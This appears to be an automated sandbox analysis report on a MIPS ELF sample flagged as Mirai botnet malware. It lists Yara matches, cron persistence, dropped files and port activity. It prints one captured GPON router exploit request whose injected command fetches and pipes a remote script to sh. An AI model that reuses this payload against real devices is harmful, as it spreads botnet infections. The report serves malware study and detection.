Source: global traffic DNS traffic detected: DNS query: eddl.ru
Source: global traffic DNS traffic detected: DNS query: www.eddl.ru
Source: global traffic DNS traffic detected: DNS query: ellc.ru
Source: global traffic DNS traffic detected: DNS query: www.ellc.ru
Source: global traffic DNS traffic detected: DNS query: cdka.ru
Source: global traffic DNS traffic detected: DNS query: www.cdka.ru
Source: global traffic DNS traffic detected: DNS query: cdad.ru
Source: global traffic DNS traffic detected: DNS query: www.cdad.ru
Source: global traffic DNS traffic detected: DNS query: dffe.ru
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: firmware.mipsel.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5641.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5639.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5643.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5657.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5656.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/dxyeeuv, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: dropped/dxyeeuv, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: firmware.mipsel.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5641.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5639.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5643.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5657.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5656.1.00007fbcec400000.00007fbcec422000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: /usr/bin/dxyeeuv, type: DROPPED Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: dropped/dxyeeuv, type: DROPPED Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: classification engine Classification label: mal92.troj.evad.linELF@0/24@1181/0

Persistence and Installation Behavior
barindex
Executes the "crontab" command typically for achieving persistence
Source: /bin/sh (PID: 5705) Crontab executable: /usr/bin/crontab -> crontab /var/spool/cron/crontabs/root Jump to behavior
Source: /bin/sh (PID: 5706) Crontab executable: /usr/bin/crontab -> crontab /var/spool/cron/crontabs/root Jump to behavior
Sample tries to persist itself using cron
Source: /tmp/firmware.mipsel.elf (PID: 5641) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5643) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /usr/bin/crontab (PID: 5705) File: /var/spool/cron/crontabs/tmp.0lejzz Jump to behavior
Source: /usr/bin/crontab (PID: 5705) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /usr/bin/crontab (PID: 5706) File: /var/spool/cron/crontabs/tmp.vDnqnF Jump to behavior
Source: /usr/bin/crontab (PID: 5706) File: /var/spool/cron/crontabs/root Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/firmware.mipsel.elf (PID: 5660) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5718) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5756) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5777) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5796) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5814) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5830) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5845) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5863) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5670) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5703) Shell command executed: sh -c "crontab /var/spool/cron/crontabs/root" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5659) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5725) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5761) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5772) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5788) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5805) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5822) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5835) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5852) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5866) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5668) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5701) Shell command executed: sh -c "crontab /var/spool/cron/crontabs/root" Jump to behavior
Executes the "hostname" command used to retrieve the computers name
Source: /bin/sh (PID: 5674) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5724) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5758) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5783) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5801) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5819) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5832) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5851) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5865) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5675) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5677) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5730) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5763) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5774) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5793) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5811) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5827) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5837) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5854) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5868) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 5676) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Sample tries to set the executable flag
Source: /tmp/firmware.mipsel.elf (PID: 5641) File: /bin/dxyeeuv (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/firmware.mipsel.elf (PID: 5643) File: /bin/dxyeeuv (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/firmware.mipsel.elf (PID: 5641) File written: /usr/bin/dxyeeuv
Source: /tmp/firmware.mipsel.elf (PID: 5643) File written: /usr/bin/dxyeeuv Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /tmp/firmware.mipsel.elf (PID: 5641) File: /usr/bin/dxyeeuv
Source: /tmp/firmware.mipsel.elf (PID: 5643) File: /usr/bin/dxyeeuv Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 60056 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 60062 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51356 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60066 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51360 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60070 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51364 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60074 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51370 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 51374 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60084 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51378 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51382 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40634 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40642 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40648 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40650 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40652 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40654 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40664 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 46234 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46236 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46238 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46240 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46242 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46244 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46250 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 36022 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54608 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36030 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54616 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36040 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54626 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36050 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54636 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36060 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54646 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36072 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54658 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36082 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54670 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 32782 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32792 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32802 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32810 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32818 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32828 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32840 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 59556 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59570 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59580 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59592 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59602 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59612 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59622 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 37556 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37572 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37590 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37604 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37620 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37632 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37646 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 40634 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39238 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40638 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39242 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40642 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39246 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40646 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39250 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39254 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40650 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39256 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40656 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39260 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40660 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 54286 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 41766 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54290 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 41770 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54294 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 41820 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54552 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42056 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54704 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42288 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54814 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42398 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54990 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42522 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 39730 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39818 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39820 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39910 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39998 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40016 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58600 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58604 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58606 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58608 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58612 -> 83
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/firmware.mipsel.elf (PID: 5639) Queries kernel information via 'uname': Jump to behavior
Source: firmware.mipsel.elf, 5639.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5641.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5643.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5657.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5656.1.000055f672177000.000055f6721fe000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: firmware.mipsel.elf, 5639.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5641.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5643.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5657.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5656.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/firmware.mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/firmware.mipsel.elf
